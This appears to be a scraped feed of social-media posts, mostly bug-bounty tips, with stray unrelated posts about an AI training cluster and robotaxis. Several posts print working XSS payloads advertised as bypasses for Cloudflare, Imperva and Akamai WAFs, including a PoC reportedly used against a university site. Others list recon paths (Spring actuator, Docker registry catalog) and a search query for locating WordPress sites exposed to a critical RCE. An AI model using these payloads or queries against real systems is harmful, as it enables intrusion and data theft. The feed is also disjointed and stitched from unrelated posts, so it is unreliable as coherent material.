INTRODUCING: Agentic Security - LLM Security Scanner! 🔍 🔑 Features: Scans for prompt injections, jailbreaking & more. Provides detailed reports & options to customize attack rules. 🔗access the GitHub Link ↓

#XSS #WAF #Bypass ➡️ CloudFlare <Img Src=OnXSS OnError=alert(1)> ➡️ Imperva <Img Src=//X55.is OnLoad%0C=import(Src)// ➡️ Akamai <A AutoFocus HRef %252F=""OnFocus=top/**/?.['al'%2B'ert'](1)> Sign up now! knoxss.me 😎 By Brute Logic

If you have issues bypassing WAF on POST/PUT/PATCH methods manually, you could try this extension: github.com/assetnote/nowa… Absolute game-changer. Credits to shubs for bringing this in for public. #bugbounty

🚀 #IBRAHIMXSS Tool Giveaway! 🚀 To celebrate the upcoming release of my #IBRAHIMXSS Tool in just 3 days, I’m giving away #FREE access for 3 months to 3 lucky winners! 🎉 ~How to enter: Share this post 💠 Repost Like this post 👍 It’s that simple! The giveaway starts now

Nice work by @xAI team, X team, @Nvidia & supporting companies getting Memphis Supercluster training started at ~4:20am local time. With 100k liquid-cooled H100s on a single RDMA fabric, it’s the most powerful AI training cluster in the world!

Add to your wordlist : actuator/env actuator/auditevents actuator/beans actuator/caches actuator/configprops actuator/health actuator/heapdump actuator/info actuator/integrationgraph actuator/configprops #bugbountytip #bugbountytips #bugbounty #hackerone #bugcrowd #h1

try this sqli methodlogy by me and check you results+WafBypass live video soon.. github.com/coffinxp/BSQLi

If you discover the Docker Registry Domain, be sure to check the /v2/_catalog endpoint, as this domain should be 401, if access is allowed. you can get everything 🥰 so you can disclose sensitive data, rce, all information #bugbountytips #BugBounty github.com/Syzik/DockerRe…

If you encounter the default IIS Windows window, do not forget to add /haproxy and /netdata to your wordlist and scan them, if you gain unauthorized access here, you will earn a reward 🌹🥰 #bugbountytips #BugBounty

🚨Alert🚨CVE-2024-5932 (CVSS 10): Critical RCE Vulnerability Impacts 100k+ WordPress Sites! 📊 173K+ Services are found on hunter.how yearly 🔗Hunter Link: hunter.how/list?searchVal… 👇Search Query HUNTER: web.body="/wp-content/plugins/give"

Security Post - Day 22 #CyberSecurity #bugbountytips #bugbounty #streaking #Tweets

W.AF AKAM.AI by.pass Lead to 30 XSS in large BBP🤯 "><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto"> Writeup Soon🫡 #bugbountytips #bugbountytip #bugbounty #hackerone #bugcrowd

Ali congratulations for your reports however it is only the newly introduced JS event; most WAFs have not added it yet remember to credit the author: Masato Kinugawa x.com/kinugawamasato…

always examine the .js files in the source code, for this I can recommend this simple but effective tool github.com/w9w/JSA from here you can access the endpoints of critical data, the places where backup files are stored and many endpoints 🌹🥰🥳 #bugbountytip #bugbounty

🚨 XSS Alert! 🚨 Just exploited an XSS vulnerability on Harvard 🔥 Watch out for reflected XSS in the search parameter! Here's the PoC: "-->""/>Hack by Fagun</script><deTailS open x=">" ontoggle=(co\u006efirm)``>" #bugbounty #cybersecurity #XSS #mejbaurbaharfagun #bug #bounty

Robotaxi wireless charging No hands required

How I stay updated with CVEs? by @KonwarAbhi98099 🪐 curl cvedb.shodan.io/cves | jq | grep "cve_id"

A solid XSS payload that bypasses Imperva WAF ⚙️ <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click #infosec #cybersec #bugbountytips

Top Shodan queries for reconnaissance! 🤑 👇

with the security advisory published, I should publish my paper within a few hours Race-Condition to Cache Poisoning - CVE-2025-32421 on Next.js partially leading to the bypass of my previous vulnerability the CVE-2024-46982